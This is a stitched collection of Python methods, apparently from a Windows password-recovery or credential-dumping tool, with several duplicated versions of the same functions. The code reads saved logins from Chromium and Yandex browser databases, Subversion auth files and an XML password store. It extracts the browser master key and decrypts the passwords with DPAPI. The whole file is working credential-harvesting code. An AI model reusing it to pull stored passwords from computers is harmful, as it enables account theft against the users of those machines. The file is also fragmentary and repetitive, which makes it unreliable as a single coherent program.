def _export_credentials(self, db_path):
"""
Export credentials from the given database
:param unicode db_path: database path
:return: list of credentials
:rtype: tuple
"""
credentials = []
try:
conn = sqlite3.connect(db_path)
cursor = conn.cursor()
cursor.execute(self.database_query)
except Exception as e:
print_debug('DEBUG', str(e))
print_debug('ERROR', u'An error occurred while opening the database file')
return credentials
for url, login, password in cursor.fetchall():
try:
# Decrypt the Password
password = Win32CryptUnprotectData(password)
credentials.append((url, login, password))
except Exception:
print_debug('DEBUG', traceback.format_exc())
conn.close()
return credentials
def _export_credentials(self, db_path):
"""
Export credentials from the given database
:param unicode db_path: database path
:return: list of credentials
:rtype: tuple
"""
credentials = []
try:
conn = sqlite3.connect(db_path)
cursor = conn.cursor()
cursor.execute(self.database_query)
except Exception as e:
self.debug(str(e))
return credentials
for url, login, password in cursor.fetchall():
try:
# Decrypt the Password
password = Win32CryptUnprotectData(
password,
is_current_user=constant.is_current_user,
user_dpapi=constant.user_dpapi)
credentials.append((url, login, password))
except Exception:
self.debug(traceback.format_exc())
conn.close()
return credentials
def run(self):
xml_file = self.get_application_path()
if xml_file and os.path.exists(xml_file):
tree = ElementTree(file=xml_file)
pwd_found = []
for elem in tree.iter():
try:
if elem.attrib['name'].startswith('ftp') or elem.attrib['name'].startswith('ftps') \
or elem.attrib['name'].startswith('sftp') or elem.attrib['name'].startswith('http') \
or elem.attrib['name'].startswith('https'):
encrypted_password = base64.b64decode(
elem.attrib['value'])
password = Win32CryptUnprotectData(
encrypted_password,
is_current_user=constant.is_current_user,
user_dpapi=constant.user_dpapi)
pwd_found.append({
'URL': elem.attrib['name'],
'Password': password,
})
except Exception as e:
self.debug(str(e))
return pwd_found
def decrypt_password(self, encrypted_password, entropy):
result_bytes = Win32CryptUnprotectData(
encrypted_password,
entropy=entropy,
is_current_user=constant.is_current_user,
user_dpapi=constant.user_dpapi)
return result_bytes.decode("utf-8")
def decrypt_password(self, encrypted_password):
try:
decoded = base64.b64decode(encrypted_password)
password_decrypted = Win32CryptUnprotectData(decoded, is_current_user=constant.is_current_user, user_dpapi=constant.user_dpapi)
password_decrypted = password_decrypted.replace('\x00', '')
except Exception:
password_decrypted = encrypted_password.replace('\x00', '')
return password_decrypted
def decrypt_password(self, encrypted_password):
try:
decoded = base64.b64decode(encrypted_password)
password_decrypted = Win32CryptUnprotectData(decoded)
password_decrypted = password_decrypted.replace('\x00', '')
except Exception:
password_decrypted = encrypted_password.replace('\x00', '')
return password_decrypted
def run(self):
pwd_found = []
path = os.path.join(constant.profile["APPDATA"],
u'Subversion\\auth\\svn.simple')
if os.path.exists(path):
for root, dirs, files in os.walk(path + os.sep):
for filename in files:
f = open(os.path.join(path, filename), 'r')
url = ''
username = ''
result = ''
i = 0
# password
for line in f:
if i == -1:
result = line.replace('\n', '')
break
if line.startswith('password'):
i = -3
i += 1
i = 0
# url
for line in f:
if i == -1:
url = line.replace('\n', '')
break
if line.startswith('svn:realmstring'):
i = -3
i += 1
i = 0
# username
for line in f:
if i == -1:
username = line.replace('\n', '')
break
if line.startswith('username'):
i = -3
i += 1
# encrypted the password
if result:
try:
password = Win32CryptUnprotectData(
base64.b64decode(result),
is_current_user=constant.is_current_user,
user_dpapi=constant.user_dpapi)
pwd_found.append({
'URL': url,
'Login': username,
'Password': str(password)
})
except Exception:
pass
return pwd_found
def _get_database_dirs(self, db_filenames=[]):
"""
Return database directories for all profiles within all paths
"""
databases = set()
for path in [p.format(**constant.profile) for p in self.paths]:
profiles_path = os.path.join(path, u'Local State')
if os.path.exists(profiles_path):
master_key = None
# List all users profile (empty string means current dir, without a profile)
profiles = {'Default', ''}
# Automatic join all other additional profiles
for dirs in os.listdir(path):
dirs_path = os.path.join(path, dirs)
if os.path.isdir(dirs_path) and dirs.startswith('Profile'):
profiles.add(dirs)
with open(profiles_path) as f:
try:
data = json.load(f)
# Add profiles from json to Default profile. set removes duplicates
profiles |= set(data['profile']['info_cache'])
except Exception:
pass
with open(profiles_path) as f:
try:
master_key = base64.b64decode(
json.load(f)["os_crypt"]["encrypted_key"])
master_key = master_key[5:] # removing DPAPI
master_key = Win32CryptUnprotectData(
master_key,
is_current_user=constant.is_current_user,
user_dpapi=constant.user_dpapi)
except Exception as e:
master_key = None
# Each profile has its own password database
db_filenames = db_filenames or [
'login data', 'ya passman data'
]
for profile in profiles:
# Some browsers use names other than "Login Data"
# Like YandexBrowser - "Ya Login Data", UC Browser - "UC Login Data.18"
try:
db_files = os.listdir(os.path.join(path, profile))
except Exception:
continue
for db in db_files:
if db.lower() in db_filenames:
databases.add((os.path.join(path, profile,
db), master_key))
return databases
def _export_credentials(self, db_path, is_yandex=False, master_key=None):
"""
Export credentials from the given database
:param unicode db_path: database path
:return: list of credentials
:rtype: tuple
"""
credentials = []
yandex_enckey = None
if is_yandex:
try:
credman_passwords = Credman().run()
for credman_password in credman_passwords:
if b'Yandex' in credman_password.get('URL', b''):
if credman_password.get('Password'):
yandex_enckey = credman_password.get('Password')
self.info('EncKey found: {encKey}'.format(
encKey=repr(yandex_enckey)))
except Exception:
self.debug(traceback.format_exc())
# Passwords could not be decrypted without encKey
self.info('EncKey has not been retrieved')
return []
try:
conn = sqlite3.connect(db_path)
cursor = conn.cursor()
cursor.execute(self.database_query)
except Exception:
self.debug(traceback.format_exc())
return credentials
for url, login, password in cursor.fetchall():
try:
# Yandex passwords use a masterkey stored on windows credential manager
# https://yandex.com/support/browser-passwords-crypto/without-master.html
if is_yandex and yandex_enckey:
try:
try:
p = json.loads(str(password))
except Exception:
p = json.loads(password)
password = base64.b64decode(p['p'])
except Exception:
# New version does not use json format
pass
# Passwords are stored using AES-256-GCM algorithm
# The key used to encrypt is stored on the credential manager
# yandex_enckey:
# - 4 bytes should be removed to be 256 bits
# - these 4 bytes correspond to the nonce ?
# cipher = AES.new(yandex_enckey, AES.MODE_GCM)
# plaintext = cipher.decrypt(password)
# Failed...
else:
# Decrypt the Password
try:
password_bytes = Win32CryptUnprotectData(
password,
is_current_user=constant.is_current_user,
user_dpapi=constant.user_dpapi)
except AttributeError:
try:
password_bytes = Win32CryptUnprotectData(
password,
is_current_user=constant.is_current_user,
user_dpapi=constant.user_dpapi)
except:
password_bytes = None
if password_bytes is not None:
password = password_bytes.decode("utf-8")
elif master_key:
password = self._decrypt_v80(password, master_key)
if not url and not login and not password:
continue
credentials.append((url, login, password))
except Exception:
self.debug(traceback.format_exc())
conn.close()
return credentials
def decrypt_password(self, encrypted_password, entropy):
return Win32CryptUnprotectData(
encrypted_password,
entropy=entropy,
is_current_user=constant.is_current_user,
user_dpapi=constant.user_dpapi)
def _export_credentials(self, db_path, is_yandex=False):
"""
Export credentials from the given database
:param unicode db_path: database path
:return: list of credentials
:rtype: tuple
"""
credentials = []
yandex_enckey = None
if is_yandex:
try:
credman_passwords = Credman().run()
for credman_password in credman_passwords:
if b'Yandex' in credman_password.get('URL', b''):
if credman_password.get('Password'):
yandex_enckey = credman_password.get('Password')
self.info('EncKey found: {encKey}'.format(
encKey=repr(yandex_enckey)))
except Exception:
self.debug(traceback.format_exc())
# Passwords could not be decrypted without encKey
self.info('EncKey has not been retrieved')
return []
try:
conn = sqlite3.connect(db_path)
cursor = conn.cursor()
cursor.execute(self.database_query)
except Exception:
self.debug(traceback.format_exc())
return credentials
for url, login, password in cursor.fetchall():
try:
# Yandex passwords use a masterkey stored on windows credential manager
# https://yandex.com/support/browser-passwords-crypto/without-master.html
if is_yandex and yandex_enckey:
try:
p = json.loads(str(password))
except Exception:
p = json.loads(password)
password = base64.b64decode(p['p'])
# Passwords are stored using AES-256-GCM algorithm
# The key used to encrypt is stored on the credential manager
# from cryptography.hazmat.primitives.ciphers.aead import AESGCM
# aesgcm = AESGCM(yandex_enckey)
# Failed...
else:
# Decrypt the Password
password = Win32CryptUnprotectData(
password,
is_current_user=constant.is_current_user,
user_dpapi=constant.user_dpapi)
if not url and not login and not password:
continue
credentials.append((url, login, password))
except Exception:
self.debug(traceback.format_exc())
conn.close()
return credentials
